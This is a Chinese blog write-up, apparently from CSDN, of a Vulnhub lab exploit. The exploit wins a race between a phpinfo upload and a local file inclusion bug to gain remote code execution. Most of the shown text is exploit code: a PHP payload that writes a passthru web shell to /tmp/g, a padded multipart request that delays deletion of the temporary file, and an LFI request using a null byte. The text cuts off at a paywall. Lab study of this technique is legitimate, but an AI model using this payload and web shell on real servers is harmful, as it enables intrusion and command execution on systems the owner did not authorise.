该实验为Vulnhub上的一个漏洞环境,利用phpinfo与LFI(本地文件包含)漏洞,实现RCE。
这里用到了如下几个条件:
1.php的config配置文件里file_uploads=on则,php会接收post请求传输的文件,并临时存储在一个目录中,当该post请求处理结束后,服务端就会将该临时文件删除;
2.php需要一个LFI漏洞,方便我们去访问上传的恶意的临时文件,临时文件中写好了恶意的php脚本。
exp的实现思路:
1.以post的形式传输一个文件给phpinfo,同时在请求头中写入大量的垃圾数据。
- 传给phpinfo的原因是,在phpinfo的页面里会显示PHP变量的值,包括_GET、_POST、_FILES所获取的变量值,这个特点能帮助我们找到临时文件被存储的路径,方便我们后面使用LFI去访问这个临时文件,如图1;
- 请求头写入大量垃圾数据的原因是,一旦该请求被处理结束(包括发送完响应),临时文件就会被删除,为了能得到足够的时间来上传恶意文件—>
访问恶意文件——> 执行恶意文件里的php脚本,所以我们希望延长服务端发送响应的时间,因此在请求头写入大量垃圾数据。
:
TAG = "Security Test"
PAYLAOD = """%s\r
<?php $c=fopen('/tmp/g','w');fwrite($c,'<?php passthru($_GET["f"]);?>');?>\r""" % TAG
REQ1_DATA = """---------------------------7dbff1ded0714\r
Content-Disposition: form-data; name="dummyname"; filename="test.txt"\r
Content-Type: text/plain\r
\r
%s
---------------------------7dbff1ded0714--\r""" % PAYLAOD
padding = "A" * 5000 #大量的垃圾数据
REQ1 = """POST /phpinfo.php?a=""" + padding + """ HTTP/1.1\r
Cookie: PHPSESSID=q249llvfromc1or39t6tvnun42; othercookie=""" + padding + """\r
HTTP_ACCEPT: """ + padding +"""\r
HTTP_USER_AGENT: """ + padding + """\r
HTTP_ACCEPT_LANGUAGE: """ + padding + """\r
HTTP_PRAGMA: """ + padding + """\r
Content-Type: multipart/form-data; boundary=---------------------------7dbff1ded0714\r
Content-Length: %s\r
Host: %s\r
\r
%s""" %(len(REQ1_DATA),host,REQ1_DATA)
LFIREQ = """GET /lfi.php?load=%s%%00 HTTP/1.1\r
User-Agent: Mozilla/4.0\r
Proxy-Connection: Keep-Alive\r
Host: %s\r
\r
\r
"""
return (REQ1,TAG,LFIREQ) #REQ1是对phpinfo的请求
phpInfoLFI函数,首先发请求给phpinfo,获得[tmp_name]后面的临时文件目录,再取访问LFI,如果响应中包含tag,则临时文件执行成功。
def phpInfoLFI(host, port, phpinforeq, offset, lfireq, tag):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s2 = socket.socket(socket.AF_INET
最低0.47元/天 解锁文章
1673
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
